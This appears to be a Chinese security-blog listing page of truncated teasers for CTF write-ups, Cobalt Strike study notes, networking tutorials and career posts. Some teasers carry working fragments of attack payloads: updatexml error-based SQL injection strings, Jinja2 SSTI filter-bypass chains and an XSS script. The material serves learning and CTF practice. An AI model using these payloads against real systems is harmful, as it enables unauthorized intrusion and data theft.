人生不是短跑，而是一场马拉松。经历分享我的职业成长非常有意思：和很多人一样我是专科毕业，而且我的学校是比较差的那一档。毕业的时候因为我比较内向，找工作的时候处处碰壁，找了很久才找到一份电脑城里小公司的工作…

网络技术学了这么久为什么你还是没入门？关键是这两点

在这个世界上，没有什么东西可以取代实际的经验。网络技术学习的两个关键点？ 第一没有系统的知识体系很多人学习网络技术是东学一点，西学一点，最后碰到的问题是没有完整的解决思路。我有个朋友在这个行业搞了快十年&#xff0…

交换机的接口有哪些？一文带你记住其名称及作用

1、什么是交换机？ 交换机是数据链路层的网络设备，通常用来连接终端，给终端提供转发数据的功能。我们可以看到上图中的交换机有很多接口，那么这些接口到底是干什么用的? 01 RJ-45接口这种接口就是现在最常见的网络设备接口&…

【CS学习笔记】10、如何管理Payload载荷

0x00 前言到目前为止，已经学过了如何在有漏洞的目标上获取立足点的方法，接下来将继续学习后渗透相关的知识，这一节就来学习学习 beacon 的管理、会话传递等。 0x01 Beacon 的管理 Beacon 控制台在一个 Beacon 会话上右击 interact&…

【CS学习笔记】5、如何建立Payload处理器

这一小节学起来感觉有些吃力，里面很多概念理解的不是很清楚，如果有大佬看到描述错误的地方欢迎留言指正，避免误导他人。再次声明，这只是我的个人学习笔记，不要当成教程去看，建议想学习CS的小伙伴可以看看…

【CS学习笔记】4、快速登陆和生成会话报告

0x00 介绍 Cobalt Strike生成报告的目的在于培训或帮助蓝队，在Reporting菜单栏中就可以生成报告，关于生成的报告有以下特点： 输出格式为PDF或者Word格式可以输出自定义报告并且更改图标（Cobalt Strike --> Preferences -->…

JS String to Unicode

说明 xss注入时，可能过滤 " ,导致无法使用字符串，基于JS字符串函数，实现无" 使用字符串使用复制代码，保存到html文件，在网页中输入字符串进行转换效果代码 <html> <head> <title>…

Less-13,14（报错注入）

Less-13 uname1)#&passwd1&submitSubmit 正确的不会有显示，错误的会报错报错注入查数据库 uname1) and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd1&submitSubmit uname1) and updatexml(1,concat(0x7e,(select group_concat(sch…

ctfshow-web369(SSTI)

过滤了request，之前的方法都不能用了，直接用终极代码 ?name {% set podict(poa,pa)|join%} {% set a(()|select|string|list)|attr(po)(24)%} {% set ini(a,a,dict(inita)|join,a,a)|join()%} {% set glo(a,a,dict(globalsa)|join,a,a)|join()%} {% se…

buuctf-BabySQli

POST传参，先随便传入几个值，用bp查看尝试后发现or等很多都被过滤了，但是可以用select，判断字段数说明有3个字段 ， 源代码中有加密代码，看着这纯大写数字，就猜是base32，用base32解…

ctfshow-web366,367(SSTI)

web 366 _ args [ 都被过滤了有绕过_的方法，但是因为过滤了[，也过滤了args，所以没法用用attr的话还是会有_，还要加一个和request.args作用相似的东西，request.cookies ?name{{(abc|attr(request.cookies.a)|att…

ctfshow-web365(SSTI)

这次是把args [ 和过滤了有两种方式可以绕过[ 可以用__getitem__和pop代替，因为pop会破坏数组的结构，所以更推荐用__getitem__ ?name{%setchr[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{[].__class…

ctfshow-web362(SSTI)

?name{{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的从12开始就没用了数字出现了问题，看wp用全角数字代替正常数字绕过 ?name{{"".__class__.__bases__[0].__subclasses__()[１３&#xff12…

buuctf-[Flask]SSTI

页面上只有Hello guest，源代码上也是什么都没有，抓包添加XFF也没有改变。是要GET一个参数name，这个不好想到顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了获取eval函数并执行任意python代码的POC {% for c in []…

SWPU新生赛2021 Reverse部分WriteUp

我真没想到第一波我做re比misc多。。第一波放题简单的逻辑这个题缺条件，结果太多，初步晃一眼，如果不给个大概范围，能输出的结果应该是几万~几十万。当然因为做了其他的题，了解到“简单”系列基本都是大写&#x…

2021年第一届网刃杯WP misc4解+协议2解

气死我了气死我了气死我了私钥头错了一直卡着，过了就好说多了。注：encrypted ad1是赛后出的 MISC部分签到解压得到flag.txt和一段密文 Flag.txt是0宽勾选BCDE(vim查看就可以看到要勾选这几个)、得到hint myself居然是flag.txt的md5，…

XSS(Stored)

low <script>alert(xss)</script> middle <script>被过滤了， 被转义了，<>也是被过滤了，可以尝试用编码的方式绕过，不过浏览器中会限制长度，抓包尝试但是我编码成<><> 但是什么…

buuctf-Web1

在登陆界面用sql注入的各种手段都没用，注册进去看看抓包后发现数据包有点像xss，也能使它弹窗，但是好像没什么用用标题1 会有关于sql语句的弹窗（但是如果抓包就不会出现） 也能说明是单引号闭合（1"就…

buuctf-朴实无华

扫目录也没扫出什么东西标题上有bot，想到robots.txt（有点牵强） 继续查然后线索就断了，但是这个页面应该不会没用，抓包看看（之前页面中header information-headers可能也暗示了查看头文件） 然…

buuctf-The mystery of ip

三个界面，有用的就是第二个，显示了ip地址，可以用bp抓包看看是哪里可以查出ip地址但是bp里没有找到相关的东西，就只能猜，和ip地址有关的是X-Forwarded-For，但是这里没有，就自己加一个&#xff0…

Less-18,19

Less-18 查数据库 1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) and 1 and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) and 查表名 1 and updatexml(1,concat(0x7e,(select group_concat(t…

kali常见配置（二）

一、安装python3的pip 1、sudo apt-get install python3-pip 2、选择国内源 python3的pip3默认源太慢，通常选择国内源。步骤一： mkdir -p ~/.pip 步骤二： vim ~/.pip/pip.conf 步骤三： 然后将下列的内容写入~/.pip/pip.conf即可…

基于DNS数据分析的恶意域名检测

本文主要参考的是Zhauniarovich Y, et al[1]的工作，发表在Acm Computer Surveys上的一篇较为系统地阐述了基于DNS数据分析来进行恶意域名检测的研究背景，研究过程和研究建议等内容的综述。目录1 研究背景1.1 DNS的背景知识1.1.1 DNS是什么1.1.2 域名的结…

Header space analysis: Static checking for networks

Header space analysis: Static checking for networks IntroductionThe Geometric ModelModeling Networking BoxesHeader Space AlgebraSet Operations on H \mathcal{H} HDomain, Range and Range Inverse</

windows10关闭windows Defender防病毒程序

01 开启控制面板 01 右键 --> 个性化 02 win10家庭版添加组策略 01 新建txt文件 echo off pushd "%~dp0" dir /b C:\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~3*.mum >List.txt dir /b C:\Windows\servicing\Pac…

网络安全测试工程师职能

网络安全测试工程师职能风控部门【信息安全专业】>>>>>【信息安全】网络安全测试任职具备技能岗位职责：>>> 【1】负责为客户的IT基础设施和应用系统（Web类和移动应用类）完成漏洞扫描、渗透测试服务。【2】协助…

网络工程师常用的LINUX命令你知道哪些？赶紧收藏学习

Linux操作系统被广泛的应用于企业服务器领域，目前市场上的网络设备都是使用linux内核操作系统，一些网络服务器也是使用linux操作系统下面的服务搭建实现的，目前操作系统这块也基本被linux占据，使用linux的iptables功能可以做代理服…

ctfhub-备份文件下载-.DS_Store

这道题拿到备份文件不难，重要的是利用它，查看信息直接在页面后面加上.DS_Store就下载出了文件照例用kail读取得到一串代码，我以为那是flag，提交了没用，然后又输入上网页，还是没用在网上搜 .DS_Store时…

buuctf-test_your_nc

和另外两个平台的nc题是一样的

网络安全必背简答题

威胁的分类与具体形式？ 1、基本威胁信息泄露完整性破坏拒绝服务非法使用 2、主要可实现威胁（常见威胁） 假冒（渗入威胁） 旁路控制（渗入威胁） 授权侵犯（渗入威胁） 特洛…

Vulnhub: EvilBox:One靶机

kali：192.168.111.111 靶机：192.168.111.130 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.130 secret目录爆破 feroxbuster -k -d 1 --url http://192.168.111.130/secret/ -w /opt/zidian/SecLists-2022.2/Disco…

挖矿病毒解决

1、进程 cpu 100% watchdog 2、解决 /tmp netstat（矿池、鱼池、sup）进程，文件主程序 crontab -l 计划任务分析脚本 3、如何进来的？ web日志、log4j、命令、漏洞：docker yam fastjiosn、邮件、下载恶意软件&a…

bugku-头等舱

页面上什么也没有，再看看源代码， text/html好像有点不一样，但不管怎么尝试都没有用然后，尝试用burp抓包在头部信息（题目名字叫头等舱）就可以看到flag

bugku-计算器

这里只能输入一个数字，但计算结果是两位或者三位，可能是输入长度被限制了， 通过查找发现，maxlength可以限制字符长度查看器下面有maxlength，将其改为3， 即可输入完整数字得到flag

逆向工程核心原理——代码注入

什么是代码注入？ 代码注入是一种向目标进程插入独立运行代码并使之运行的技术，它一般调用CreateRemoteThread()API以远程线程形式运行插入的代码，所以也被称为线程注入。使用代码注入的原因其实，代码注入要实现的功能与DLL注入…

逆向工程核心原理——消息钩取

钩子（HOOK） 英文Hook一词，翻成中文是“钩子”、“鱼钩”的意思，泛指钓取所需东西而使用的一切工具。“钩子”这一基本含义延伸发展为“偷看或截取信息时所用的手段或工具”。下面举例向各位进一步说明“钩子”这一概念。消息…

网络安全做红队攻防 35 岁以后可以干嘛？

35岁之后不是都当技术总监，CTO了或者自己创业了吗？ 不会，单渗透测试来说，到后期更多是经验的积累。同一个事情，经验老道师傅的可能用更少的命令，发更少的请求完成这个事情，更隐蔽，更…

VulnHub靶场-Chronos

目录 0x01 声明： 0x02 简介： 0x03 环境准备： 0x04 信息收集： 1、主机发现 2、NMAP扫描 3、访问业务 4、目录探测 5、查看网页代码 0x05 渗透测试过程： 1、Burp Suite抓包 2、构造payload 测试是否可以外联…

PLC 操纵程序在胶带输送机综合爱惜装置的应用

胶带输送机综合爱惜装置要紧包括主机、防滑爱惜、堆煤爱惜和防跑偏爱惜、温度爱惜、烟雾爱惜和自动洒水装置，和沿线紧停开关和全巷道语音报警信号等，现就 PLC 可编程操纵系统在综合爱惜装置中的应用做如下介绍： 主机主机可采纳 PLC 多…

支付或不支付，屈服于勒索软件的利弊

从表面上看，遭受勒索软件攻击绝对是最糟糕的情况--但事情并没有就此结束。对大多数受害者来说，接下来是一个巨大的决定，必须在巨大的压力下决定，而且没有什么时间可以浪费。支付或不支付。这就是问题所在。如果你问联邦调查局&a…

【经验总结】CS与MSF之间的会话传递

0x00 前言众所周知，Cobalt Strike 的前身是 Armitage，而 Armitage 又可以理解为 Metasploit Framework 的图形界面版，因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的，所以我们便可以将 Metasploit Framework…

腾讯安全升级三大原子能力，助力企业构建数字安全免疫力

数字化时代，企业如何治好“发展”与“安全”失调症？近日,腾讯安全、IDC、腾讯研究院等联合举办研讨论坛，发布“数字安全免疫力”模型框架，提出用免疫思维应对新时期下安全建设与企业发展难以协同的挑战。 (腾讯安全联合IDC发布“…

PHP伪协议filter详解，php://filter协议过滤器

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 php://filter 一、访问数据流二、过滤数据流三、多…

【CS学习笔记】22、通过SSH开通通道

0x00 前言这一节将来介绍如何通过 SSH 通道进行攻击。 0x01 通过 SSH 建立通道 1、连接到上图中蓝色区域里的 PIVOT 主机并开启端口转发 ssh -D 1080 user<blue pivot>该命令中的 -D 参数会使 SSH 建立一个 socket，并去监听本地的 1080 端口，一…

【CS学习笔记】21、反向转发通道的建立

0x00 前言这一节将介绍使用 ProxyChains 进行代理转发与使用反向转发的方法。 0x01 使用 ProxyChains 进行代理转发介绍使用 ProxyChains 可以使我们为没有代理配置功能的软件强制使用代理和上一节中介绍的一致，开启一个 socks 代理服务配置 /etc/proxycha…

【CS学习笔记】20、通过Socks转发的方法

0x00 前言这一小节中，将看看如何构建一个 SOCKS 代理服务器使一个上线主机变成我们的跳板机。 0x01 Pivoting 根据 A-Team 团队中 CS 手册中的介绍，Pivoting 是指将一个受害机器转为其他攻击和工具的跳板的操作。在进行 Pivoting 操作之前&#xf…

《网络安全0-100》网络安全工具

网络安全工具抓包工具抓包工具是网络安全领域中常用的一种工具，用于捕获和分析网络数据包，帮助用户了解网络流量、发现网络攻击和漏洞等问题。以下是几个常用的抓包工具： Wireshark：Wireshark是一种开放源代码的网络协议分析工…

ctfshow-web364(SSTI)

用上题的方法，发现还是有东西被过滤了筛选后发现是args 过滤了引号和args,上题的姿势不能用了，但是可以用chr()函数绕过。可以用这个payload判断chr()函数的位置： {{().__class__.__bases__[0].__subclasses__()[0].__init__.__globals__.…

buuctf-[华东南赛区]Web11

页面上没有很清楚的东西，抓包看看，会有IP地址的显示，但是网页中显示的API的URL由于环境的原因无法使用（API接口简单来说就是数据传输的一个通道），说明可能有XFF控制IP 尝试一下，确实是这样&…

buuctf-Fake XML cookbook

抓包后看它的传参格式有点像xss，但是尝试过没有回显，看别人的wp，是xxe，也是和html有关直接粘贴别人的payload，然后分析学习下 <?xml version"1.0" encoding"utf-8"?> <!DOCTYPE not…

buuctf-Fakebook（报错注入）

blog要有http:// 可以尝试sql注入，但是我用sqlmap注入不了，不知道为什么然后尝试手工，试过很多闭合方式都不行，后来发现直接就是整型注入正确的情况不会有回显，错误会有，试试报错注入这里有个之前没见…

Less-20

只能用cookie传参，如果用POST传参，就会提示用cookie，无论cookie中输入什么都是这样 uname1# uname1 order by 3# uname1 order by 2# 都不会有任何回显，但是4就会报错，也只会报错但是select的时候又直接回显了&…

Less-17

User Name必须要是admin其他的都不行，看题目界面知道是更新密码的题，和之前的都有些不一样（所以按理说应该也是正确了不会有回显，错误了会有显示，所以应该用报错注入） 格式变成了这样 unameadmin&pass…

OSPF的知识点总结及其扩展

OSPF：开放式最短路径优先协议无类别链路状态型IGP协议；由于其基于拓扑进行更新收敛，故更新量会随着拓扑的变大而成指数上升；故OSPF协议为了能在大、中型网络中运行，需要结构化的部署----合理的区域划分、良好的地址规…

phpweb

翻译了下上面的话大概fun传入函数，p传入参数出现了源代码 <?php$disable_fun array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen&qu…

BGP的全连实验

题目如下： 拓扑图及其IP地址分配如下 ： 实验分析 ： R1 R2之间是EBGP，R2 R3，R3 R4之间是IBGP ，R4 R5之间是EBGP 运行BGP协议要建立在IGP之上注意IBGP水平分割实验配置： IP配置&#xff1a…

Pass-13

function getReailFileType($filename){$file fopen($filename, "rb");$bin fread($file, 2); //只读2字节fclose($file);$strInfo unpack("C2chars", $bin); $typeCode intval($strInfo[chars1].$strInfo[chars2]); $fileType ; switch($ty…

ENSP重发布实验

题目要求： 题目分析： 由题目我们知道，整个路由拓扑图分为RIP区域，OSPF区域，以及R7的环回三个区域。其中R2 的环回在RIP区域，R3的环回在OSPF区域。所以我们需要手动修改R3的工作方式为Broadcast。在RIP…

AWD平台搭建（Cardinal 从零开始） 2021/11/17

#Time 2021/11/17 因为之后要在校内组织AWD比赛，所以在github上找了一会，试了试最多star的，虽然说好用但是没有好康的界面，全是一堆代码感觉很枯燥，于是最终还是选择了使用Cardinal来搭建。中间有一些坑点都已解决。 …

2021 陇原抗疫 WriteUp

希望疫情早日结束注：打*的是赛后出的总WP：https://wp.n03tack.top/posts/14620/ Misc soEasyCheckin base32，但有问题，倒数出现了0$，0–>O,$—>S，得到一串hex。结果hex那里又有问题&#xff0…

SWPU新生赛2021 Crypto部分WriteUp

第一波放题 crypto1 直接谷歌搜e1e2 3087 n p*q，找到striving的博客，不愧是密码神由于striving的旧博客域名已过期，因此就不放密码神的博客了 c1 4636340709718214496980128276315726653025892138685214918550389668790057843973093899…

WLAN——一篇让你从0到1了解无线局域网的文章

WLANWLAN定义和基本架构WLAN定义WLAN基本架构FAT APFAT AP优劣及应用场景FIT APWLAN射频和信道射频信道WLAN标准协议WLAN常用概念SSID（ESSID）服务集BSSESSVAPAP上线过程（重！）AP获取IP地址AP发现ACCAPWAP隧道建链AP接入…

SWPU新生赛2021 Web部分WriteUp

第一波放题 gift_F12 直接F12之后搜flag WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} caidao 基操题，就不用菜刀，蚁剑直接连，密码wllm，地址就访问的地址，进去在根目录找到flag jicao 搜一下json就会了&#x…

BUUCTF 还原大师 1

题目描述： 我们得到了一串神秘字符串：TASC?O3RJMV?WDJKX?ZM,问号部分是未知大写字母，为了确定这个神秘字符串，我们通过了其他途径获得了这个字串的32位MD5码。但是我们获得它的32位MD5码也是残缺不全，E903???4D…

第一届长城杯部分WP

19 签到 16进制的asciibase64，手速是吧，直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗前面不说了，两张图片尾部都有rar，提取出来一个hint和一个password的表格，hint给了16位的base64，加密…

5大网络排障工具，擅长使用这些的网工受益无穷

网络排障作为每个网工的必备技能，也是工作上的一个难点，如果能用好网络故障排除工具能高效提升你的工作效率，非常的好用！还不快来看看吗？ 1、局域网分析工具 IP Tools：Network Utilities Network Utiliti…

逆向工程核心原理——DLL注入——创建远程线程

什么是DLL注入？ dll注入是一种将Windows动态链接库注入到目标进程中的技术，具体的说，就是将dll文件加载到一个进程的虚拟地址空间中。对某个进程进行dll注入，也就意味着dll模块与该进程共用一个进程空间，则这个dll文件…

关于网络安全精英赛（初赛），我个人的知识盲点

重点在扫盲目录一.奇奇怪怪的专业名词二.各种杂乱的知识点概括整理 2.1网络安全威胁 a.概念 b.类型 c.分类系统漏洞危险有害程序威胁 2.2 安全策略物理安全策略访问控制策略安全性指标安全等级 2.3密码分类和攻击类型 a.定义 b.经典密码分析一.奇奇…

BUUCTF RE WP31-32 [WUSTCTF2020]level1、[GWCTF 2019]xxor

31.[WUSTCTF2020]level1 得到的 flag 请包上 flag{} 提交。感谢 Iven Huang 师傅供题。比赛平台：https://ctfgame.w-ais.cn/ 给了一个ELF和一个txt，txt是一串数字，共有19个，ELF无壳，IDA打开找到main函数&#xff0c…

ctfshow 8神PNG隐写入门(土)赛 WP

非常好玩，考点齐全，复习了一遍，希望下次出需要用特别特别简单的脚本的题。记录wp顺便拿来当复习了。本来想着按照做题顺序写，后来发现有点乱，还是按照题目序号写题目描述想要我的flag吗？如果想要的话&a…

弱电转网络工程师可行吗？过来人分享转行成功经验及路线

没有目的，生活便郁闷无光。为什么从弱电转行？ 从事过弱电的朋友都知道，每天的工作都是布线施工，动不动高空作业，而且天天要去工地，基本上是靠体力的挣钱。当时脱离弱电时我就是想改变一下现状&#xff0c…

非常实用，华为、新华三、锐捷交换机的配置命令分享

干弱电这一行难免会接触到交换机，华为、新华三锐捷交换机又是最常见的交换机，关于他们的命令配置很容易弄混，而且在实际项目配置中也很容易出错，因此，本期我们将来介绍这三家交换机的基础配置命令，大家可以…

从零基础到考取HCIP，我是如何去系统学习网工知识的

我从不认为自己是学习的好手，只是愿意去学而已。前文：从房产销售到技术网工，我花了3个月时间改变职业方向我之前有很长一段时间没有接触网络相关的工作，重新开始学习考证HCIP的时候其实就比纯小白的基础稍微好一点，所…

ctfshow月饼杯misc1_共婵娟

不得不说，la师傅出的misc题tql 对我这种才学一两个月的新人简直不讲武德层层套，层层解密感谢DonmeN一起前进和提供USB流量思路 misc1_共婵娟但愿人长久，千里共婵娟 MISC之王争夺战！ 两密一一对应，填入神秘代码 ⎝La…

Redis未授权漏洞复现及利用（window,linux）

目录 1.了解redis 2.redis漏洞原理 3.redis漏洞复现 3.1 安装redis 3.1.1 Linux安装redis 3.1.2 windows安装redis 4.redis漏洞利用 4.1利用redis漏洞写webshell 4.1.1利用前提 4.1.2上传webshell 4.2利用redis漏洞ssh密钥连接 4.2.1 ssh密钥连接 4.2.2 利用前提 …

弱电转网工，我是如何通过学习考取HCIP成为职业网工

做自己生命的主角，而不是别人生命中的看客。前文：弱电工作5年，我是如何下定决心转行从事网络技术的我做了5年的弱电，因为不想成为网工调试机器的看客，所以决心改变成为一名职业网工。我首先做的事就是离职脱产学习考…

ACL最全详解：原理及作用、分类及特点、配置及需求

ACL，中文名称是“访问控制列表”，它由一系列规则（即描述报文匹配条件的判断语句）组成。这些条件通常被称为五元组-分别是报文的源地址、目的地址、源端口、目的端口、端口号等。这样解释ACL，大大家肯定听不懂&#xff…

一文详解IP地址：含义、作用、格式、分类等

1、IP地址是什么？ IP 地址是互联网协议特有的一种地址，它是 IP 协议提供的一种统一的地址格式，为互联网上的每一个网络和每一台主机分配一个逻辑地址，以此来屏蔽物理地址的差异。 2、那么，我们为什么要使用 IP 地址呢…

细致又实用，终于有世界级网工把服务器端网络架构用图解方式讲清

不同范畴的技术一经交汇，往往能碰撞出迷人的火花。——读者说计算机之间的网络互连始于20世纪80年代。在我国，互联网从1997年才开始得到真正的发展。网络架构本身就是非常年轻的技术，谈到服务器端网络架构这个更为细化的范畴，就更…

IPV6的优势在哪，为什么说它未来会取代IPV4

随着5G通信的普及和信息时代的发展，连接到网络的用户和设备每天都在增加，然而现如今进行通信依赖的是IPv4 地址早已耗尽，尽管有NAT技术可以减少IPV4地址的消耗，但这些地址也远远不能满足日益增长的IP地址的消耗。因此，…

网络工程师必备技能——以太网基础知识

构架局域网是网络工程师必备的技能，而以太网技术又是局域网中最重要的技术之一，也是我们学习网络中遇到的重要知识点，那么今天我们就来讲解一下以太网中的基础知识。 1、以太网是一种网络类型同时也是一种技术。以太网是建立在CSMA/CD 载波…

防火墙详解（二）通过网页登录配置华为eNSP中USG6000V1防火墙

配置步骤步骤一打开eNSP，建立如下拓扑。防火墙使用：USG6000V1。 Cloud的作用是通过它可以连接本地的网卡，然后与我们的电脑进行通信。由于防火墙USG6000V，不能直接开启，需要的导入包，所以需要在华为…

几个cve漏洞库查询网站

阿里云漏洞库https://avd.aliyun.com/nvd/listtenable漏洞库(nessus)https://www.tenable.com/cve/search官方网址https://nvd.nist.gov/vuln/searchvmware tanzuhttps://tanzu.vmware.com/securityhttps://www.securityfocus.com/bid 重定向到 https://bugtraq.securityfocus.…

客户案例：构建可靠海外通邮系统，护航教育行业信息安全

►►►客户背景某985高校作为一所国内知名的高等教育机构，拥有优质的师生资源和丰富的教学经验，积极开展与国外高校的合作交流，组织师生参与出国交流、学术考察等活动，在跨境科研合作和人才培养等领域开展深入合作，推…

火力发电厂工控系统网络安全解决方案 - 对比分析

发电厂网络概述火电厂网络架构中涉及的系统主要包括：火电机组分散控制系统DCS、火电机组辅机控制系统DCS\PLC、火电厂级信息监控系统、调速系统和自动发电控制功能AGC、励磁系统和自动电压控制功能AVC、梯级调度监控系统、网控系统、继电保护、故障录波、电能量采…

超详细frp配置实现绕过防火墙内网渗透

目录 1.前言 2.准备工作（以我自己复现成功举例） 3.基于frp的ssh内网穿透 3.1服务器部署 3.2客户端部署 3.3远程连接内网电脑 4.绕过防火墙内网穿透 4.1开启防火墙 5.基于frp的web内网穿透服务 6.注意事项 1.前言我们知道公司电脑在一个局域…

文件上传漏洞绕过手法

目录 1.文件上传原理 2.文件上传检测方法 3.后端检测绕过 3.1类型检测绕过 3.2文件头检测绕过 3.3 文件内容检测绕过 3.4黑名单检测绕过 3.4.1 对于.htaccess后缀名没有过滤绕过 3.5 白名单检测绕过 3.5.1截断 3.5.2包含漏洞 3.6 解析漏洞绕过 3.6.1apache解析漏洞…

CNVD-2021-49104检测脚本（泛微E-Office文件上传漏洞）

自己写的CNVD-2021-49104检测脚本，有需要的朋友可以看看对于漏洞复现感兴趣可以看看：CNVD-2021-49104漏洞复现（泛微E-Office文件上传漏洞）_dreamthe的博客-CSDN博客 #!/usr/bin/env python3 # -*- coding: utf-8 -*- # author&a…

抓包工具之wireshark

一 Wireshark认识 wireshark是非常流行的网络封包分析软件， 功能十分强大。可以截取各种网络封包， 显示网络封包的详细信息。 wireshark是开源软件，可以运行在Windows和Mac OS上。二 Wireshark字段介绍三 Wireshark抓包演示 01 打开kali自…

ATTCK（六）之ATTCK子项目atomicredteam测试环境安装与使用

ATT&CK子项目atomicredteam测试环境安装与使用 Atomicredteam的主站点为https://atomicredteam.io/，是一个攻击测试库，每个安全团队都可以执行这些测试来测试他们的防御控件。测试是有重点的，几乎没有依赖关系，并且以结构化格…

Hacker The Box 之 Responder 7

第一题第二题 echo "10.129.99.77 unika.htb" | sudo tee -a /etc/hosts 关于页面跳转的一个技巧可以修改hosts文件禁止这种跳转，以kali为例，首先编辑/etc/hosts文件，添加一下IP地址和跳转的地址本题原理在 /etc/hosts 文件中添…

带初学者了解一下OSPF

目录前言一、OSPF产生背景二、动态路由协议的分类三、OSPF底层原理四大步骤四、OSPF基本术语：Router-ID/度量值/区域五、OSPF基础配置命令前言相信大家能点开这篇文章就代表着多多少少对静态路由都有一定的了解，静态路由具有不适用大型网络…

静态路由简介及配置---有栗子

本文紧接IP路由基础，基础不太好的同学可以先学习一下路由基础科普一下IP路由基础_xiaobai729的博客-CSDN博客目录一、静态路由应用场景二、静态路由配置命令三、举个栗子四、缺省路由一、静态路由应用场景如图RTA上转发目的地址属于20.1.1.0/24的报文&#…

Hacker The Box 之 Crocodile 6

第一题第二题第三题第四题第五题第六题第七题第八题第九题第十题（重点） 首先通过nmap扫描网段 nmap -A -sC -sV 10.129.174.157 我们可以读取到ftp服务和http服务且ftp访问是230，代表可以匿名访问读取文件 ftp 10.129.174.157 …

网安基础词汇

网安基础词汇攻击篇攻击方法攻击者文章目录网安基础词汇攻击篇**攻击工具****肉鸡：**僵尸网络：木马：网页木马：Rootkit ：蠕虫病毒：震网病毒：勒索病毒：挖矿木马：攻击载荷…

自学网络安全究竟该从何学起？

一、为什么选择网络安全？ 这几年随着我国《国家网络空间安全战略》《网络安全法》《网络安全等级保护2.0》等一系列政策/法规/标准的持续落地，网络安全行业地位、薪资随之水涨船高。未来3-5年，是安全行业的黄金发展期，提前踏入行…

能用一台电脑打败世界的男人

阿基米德可以用一根杠杆翘起整个地球，用的是杠杆原理； 米特尼克能够用一台电脑击败整个世界，用的是黑客技术。是的，这就是我今天要说的主人公：凯文米特尼克。他出生在洛杉矶一个中下层的家庭，小时候因为…

NAT解析及案例

目录一 NAT定义及作用二私有地址范围三 NAT优点及分类应用方向好处分类及应用场景四综合案例拓扑图步骤测试五总结一 NAT定义及作用定义：NAT（网络地址转换协议）是1994年提出的。当在专用网内部的一些主机本来已经…

继华为之后又一巨头组建“军团”，奇安信意欲何为？

继华为之后，国内又一大厂转向“军团”组织模式。 1月12日，奇安信发布题为《组建“军团”，为重点领域客户网络安全创造价值》全员内部信，宣布正式成立市场军团、服务军团，并在各省设立“军团”代表处。董事长齐向东还在…

Windows7之天镜漏洞扫描工具安装

01 天镜漏洞扫描工具安装 01 安装天镜 02 升级漏洞 03 重启win7, 多次重复升级过程(1次可能没办法成功) 04 成功之后查看版本

windows2003下aspx环境搭建

01 安装sql_server数据库 01 安装sql_server镜像文件 02 安装sql_server程序 03 安装更新安装向导 04 重启windows2003 05 执行setup.exe 06 SQL Server安装中心 02 安装.NET 4.0 01 安装.NET 4.0 注意: 先安装sql_server数据库, 再安装 .NET 4.002 配置IIS管理器 03 搭建网…

基于网络的漏洞扫描软件主要包括哪些组成部分？各组成部分分别发挥什么功能？

基于网络的漏洞扫描软件主要包括哪些组成部分？各组成部分分别发挥什么功能？ 扫描控制台。为用户提供了执行扫描操作的控制界面，用户可以指定扫描的地址范围、需扫描的漏洞类型、使用多少个线程进行扫描，以及扫描报告的要求等各类…

HCIP的MPLS实验

题目拓扑图 IP地址及环回配置注：R2的g0/0/1口和g0/0/2口还有R4的g0/0/0口和g0/0/2口都先不配置IP，因为后面这些接口的IP需要放入vpn空间中 R1 <Huawei>sys Enter system view, return user view with CtrlZ. [Huawei]sysname r1 [r1]int l0 […

windows权限维持—黄金白银票据隐藏用户远控RustDeskGotoHttp

windows权限维持—黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp 1. 前置1.1. 初始问题1.1.1. 解决办法 2. 隐藏用户2.1. 工具原理2.2. 案例操作2.2.1. 单机添加用户2.2.1.1. 工具添加用户2.2.1.2. 工具查看隐藏用户2.2.1.3. 本地查看隐藏用户 2.2.2. 域内添加…

（3.3）NISP1级——【网络安全防护与实践】

文章目录虚拟专用网VPN概述VPN特点VPN常用协议工作原理VPN应用VPN优缺点优点缺点防火墙防火墙应用虚拟专用网 VPN概述让外地员工访问到内网资源，利用VPN的解决方法就是在内网中架设一台VPN服务器。外地员工在当地连上互联网后，通过互联网连接VPN服务器…

vlunhub之potato

目录信息搜集扫描网段扫描端口扫描网站目录发现漏洞尝试爆破登录提权查看内核版本找到合适的poc 信息搜集扫描网段 nmap -sP 192.168.179.0/24 扫描端口 nmap -sS -sV -p- -v 192.168.179.129 扫描网站目录 dirb http://192.168.179.129/ 发现漏洞挨个…

信息搜集（五）之网站目录

一、御剑后台扫描 1、御剑后台扫描珍藏版 2、御剑无字典大小限制1937版二、dirsearch 1、从物理机复制dirsearch到kali中 2、查看帮助文档 ┌──(steven㉿kali)-[~/penetra_test/dirsearch] └─$ python3 dirsearch.py --help3、扫描 -u 指定网址 -e 指定网站语言 * 扫…

kali常见配置（一）

一、修改root密码 1、修改root密码密码设置为：123456二、开启kali远程ssh 1、配置SSH参数修改sshd_config文件，命令为：vi /etc/ssh/sshd_config将PasswordAuthentication no的注释去掉，并且将NO修改为YES。将PermitRootLogi…

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞[2023-HW]

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现小龙POC检测: 五、修复建议免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间…

BurpSuite超详细安装教程-功能概述-配置-使用教程---(附下载链接)

一、介绍 BurpSuite是渗透测试、漏洞挖掘以及Web应用程序测试的最佳工具之一，是一款用于攻击web 应用程序的集成攻击测试平台，可以进行抓包、重放、爆破，包含许多工具，能处理对应的HTTP消息、持久性、认证、代理、日志、警报。二…

渗透测试（侦查）一站式教程

